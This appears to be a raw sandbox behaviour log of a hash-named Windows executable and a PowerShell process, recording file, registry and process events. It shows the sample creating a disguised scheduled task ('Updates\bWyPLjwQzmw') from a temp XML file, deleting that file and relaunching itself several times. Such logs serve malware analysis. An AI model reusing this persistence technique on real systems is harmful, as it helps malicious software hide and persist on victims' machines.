09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\SysWOW64\tzres.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\zh-CN\tzres.dll.mui,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\System32\zh-CN\tzres.dll.mui,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\WinSxS\x86_system.data_b77a5c561934e089_4.0.15744.161_none_2c1622a959db26c0\System.Data.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\SysWOW64\ws2_32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5740,	2928,	FILE_chmod,	C:\Windows\SysWOW64\gpapi.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\zh-CN\crypt32.dll.mui,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\SysWOW64\coml2.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\SysWOW64\wshext.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:108,	2928,	FILE_chmod,	C:\Windows\SysWOW64\OpcServices.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:108,	2928,	FILE_chmod,	C:\Windows\SysWOW64\xmllite.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:232,	2928,	FILE_chmod,	C:\Windows\SysWOW64\urlmon.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:108,	2928,	FILE_chmod,	C:\Windows\SysWOW64\tdh.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:232,	2928,	FILE_chmod,	C:\Windows\SysWOW64\iertutil.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5796,	2928,	FILE_chmod,	C:\Windows\SysWOW64\uxtheme.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5764,	2928,	FILE_chmod,	C:\Windows\SysWOW64\secur32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:635,	powershell.exe,	5080:5740,	2928,	FILE_chmod,	C:\Windows\SysWOW64\msisip.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:635,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Numerics.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:635,	powershell.exe,	5080:5776,	2928,	FILE_chmod,	C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0112~31bf3856ad364e35~amd64~~10.0.17763.1.cat,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:635,	powershell.exe,	5080:108,	2928,	FILE_chmod,	C:\Windows\SysWOW64\mintdh.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:635,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\SysWOW64\AppxSip.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:635,	powershell.exe,	5080:5744,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.DirectoryServices.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:635,	powershell.exe,	5080:3720,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources\v4.0_4.0.0.0_zh-HANS_b77a5c561934e089\mscorlib.resources.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:635,	powershell.exe,	5080:5752,	2928,	FILE_chmod,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pwrshsip.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:635,	powershell.exe,	5080:5444,	2928,	FILE_chmod,	C:\Users\bonelee\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:635,	powershell.exe,	5080:5748,	2928,	FILE_chmod,	C:\Windows\WinSxS\x86_system.transactions_b77a5c561934e089_4.0.15744.161_none_ab0a76020e38cd6d\System.Transactions.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:635,	powershell.exe,	5080:5772,	2928,	FILE_chmod,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:641,	powershell.exe,	5080:5800,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:641,	powershell.exe,	5080:252,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:641,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation.Resources\v4.0_3.0.0.0_zh-HANS_31bf3856ad364e35\System.Management.Automation.Resources.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:641,	powershell.exe,	5080:5820,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:641,	powershell.exe,	5080:5756,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:641,	powershell.exe,	5080:232,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\v4.0_3.0.0.0_zh-HANS_31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.Resources.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:672,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	PROC_exec,	C:\Windows\SysWOW64\schtasks.exe,	target_pid:5176 cmdline:'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bWyPLjwQzmw" /XML "C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:672,	schtasks.exe,	5176:0,	2928,	EXEC_create,	C:\Windows\SysWOW64\schtasks.exe,	parent_pid:2928 cmdline:'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bWyPLjwQzmw" /XML "C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp"' image_base:0x0000000000EE0000 image_size:0x00033000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:672,	powershell.exe,	5080:0,	2928,	PROC_exec,	C:\Windows\System32\conhost.exe,	target_pid:7172 cmdline:'\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1' ,	0x00000000 [操作成功完成。  ],	
09:33:16:672,	powershell.exe,	5080:7324,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-2451103786-187343032-3810694054-1000\\Device\HarddiskVolume3\Windows\System32\conhost.exe,	type:0x00000003 datalen:24 data:'0E 71 C7 C8 18 DA D9 01 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:672,	conhost.exe,	7172:0,	2928,	EXEC_create,	C:\Windows\System32\conhost.exe,	parent_pid:5080 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' image_base:0x00007FF6D5C20000 image_size:0x000D1000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:672,	schtasks.exe,	5176:0,	2928,	PROC_exec,	C:\Windows\System32\conhost.exe,	target_pid:8100 cmdline:'\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1' ,	0x00000000 [操作成功完成。  ],	
09:33:16:672,	schtasks.exe,	5176:8784,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-2451103786-187343032-3810694054-1000\\Device\HarddiskVolume3\Windows\System32\conhost.exe,	type:0x00000003 datalen:24 data:'0E 71 C7 C8 18 DA D9 01 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:672,	conhost.exe,	8100:0,	2928,	EXEC_create,	C:\Windows\System32\conhost.exe,	parent_pid:5176 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' image_base:0x00007FF6D5C20000 image_size:0x000D1000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:719,	conhost.exe,	7172:0,	2928,	EXEC_module_load,	C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_05b6437c071e554b\comctl32.dll,	base:0x00007FFCF2C50000 size:0x00279000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:741,	conhost.exe,	8100:0,	2928,	EXEC_module_load,	C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_05b6437c071e554b\comctl32.dll,	base:0x00007FFCF2C50000 size:0x00279000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:741,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\Framework,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:758,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:758,	powershell.exe,	5080:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll,	base:0x000000006A3B0000 size:0x0140E000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:772,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:788,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:788,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:788,	schtasks.exe,	5176:0,	2928,	EXEC_destroy,	C:\Windows\SysWOW64\schtasks.exe,	parent_pid:2928 cmdline:'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bWyPLjwQzmw" /XML "C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:788,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:788,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_remove,	C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp,	,	0x00000000 [操作成功完成。  ],	
09:33:16:804,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:804,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:804,	powershell.exe,	5080:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll,	base:0x0000000069950000 size:0x00A55000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:804,	powershell.exe,	5080:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll,	base:0x0000000069130000 size:0x00818000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:804,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	PROC_exec,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	target_pid:8812 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:804,	conhost.exe,	8100:0,	2928,	EXEC_destroy,	C:\Windows\System32\conhost.exe,	parent_pid:5176 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' ,	0x00000000 [操作成功完成。  ],	
09:33:16:835,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8812:0,	2928,	EXEC_destroy,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:835,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	PROC_exec,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	target_pid:7580 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:835,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	7580:0,	2928,	EXEC_destroy,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:835,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	PROC_exec,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	target_pid:4964 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:835,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	PROC_exec,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	target_pid:8452 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:850,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	PROC_exec,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	target_pid:8816 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:850,	RuntimeBroker.exe,	4964:0,	2928,	EXEC_destroy,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:850,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8452:0,	2928,	EXEC_destroy,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:850,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	EXEC_create,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' image_base:0x0000000000820000 image_size:0x0008A000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:866,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\Framework,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:866,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:866,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll,	base:0x000000006A3B0000 size:0x0140E000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:866,	powershell.exe,	5080:4668,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:882,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:4640,	2928,	FILE_touch,	C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe.log,	access:0x00120196 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000005 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:33:16:882,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:4640,	2928,	FILE_write,	C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe.log,	offset:0x00000000 datalen:0x00000516 ,	0x00000000 [操作成功完成。  ],	
09:33:16:882,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	FILE_modified,	C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe.log,	,	0x00000000 [操作成功完成。  ],	
09:33:16:882,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:882,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll,	base:0x0000000069950000 size:0x00A55000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:882,	powershell.exe,	5080:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\f95c1d21c350fd9102417341a1e75e5b\Microsoft.Management.Infrastructure.ni.dll,	base:0x000000006C680000 size:0x00080000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:882,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:882,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:897,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Notifications\Data\418A073AA3BC3475,	type:0x00000003 datalen:114 data:'CB 04 00 00 00 00 00 00 04 00 04 00 01 02 02 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:917,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:917,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll,	base:0x0000000069130000 size:0x00818000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:929,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	EXEC_destroy,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	parent_pid:5192 cmdline:'C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe' ,	0x00000000 [操作成功完成。  ],	
09:33:16:929,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:929,	powershell.exe,	5080:4668,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:929,	powershell.exe,	5080:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll,	base:0x00000000689B0000 size:0x00774000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:929,	powershell.exe,	5080:4668,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:929,	powershell.exe,	5080:4668,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:929,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:929,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll,	base:0x0000000073EC0000 size:0x00106000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:944,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:944,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll,	base:0x00000000689B0000 size:0x00774000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:944,	powershell.exe,	5080:4668,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:944,	powershell.exe,	5080:4668,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:960,	powershell.exe,	5080:7324,	2928,	FILE_touch,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_qnsb5ven.vxd.ps1,	access:0x00120196 alloc_size:0 attrib:0x00000000 share_access:0x00000001 disposition:0x00000005 options:0x00400064 ,	0x00000000 [操作成功完成。  ],	
09:33:16:960,	powershell.exe,	5080:7324,	2928,	FILE_write,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_qnsb5ven.vxd.ps1,	offset:0x00000000 datalen:0x0000004D ,	0x00000000 [操作成功完成。  ],	
09:33:16:960,	powershell.exe,	5080:0,	2928,	FILE_modified,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_qnsb5ven.vxd.ps1,	,	0x00000000 [操作成功完成。  ],	
09:33:16:960,	powershell.exe,	5080:7324,	2928,	FILE_touch,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_hfpoh5qd.lbj.psm1,	access:0x00120196 alloc_size:0 attrib:0x00000000 share_access:0x00000001 disposition:0x00000005 options:0x00400064 ,	0x00000000 [操作成功完成。  ],	
09:33:16:976,	powershell.exe,	5080:7324,	2928,	FILE_write,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_hfpoh5qd.lbj.psm1,	offset:0x00000000 datalen:0x0000004D ,	0x00000000 [操作成功完成。  ],	
09:33:16:976,	powershell.exe,	5080:0,	2928,	FILE_modified,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_hfpoh5qd.lbj.psm1,	,	0x00000000 [操作成功完成。  ],	
09:33:16:976,	powershell.exe,	5080:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\cfaa34000029b18fb89febf12cd0d80c\System.Management.ni.dll,	base:0x000000006C730000 size:0x00130000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:976,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_mkkey,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32,	access:0x0002001B ,	0x00000000 [操作成功完成。  ],	
09:33:16:976,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\EnableFileTracing,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
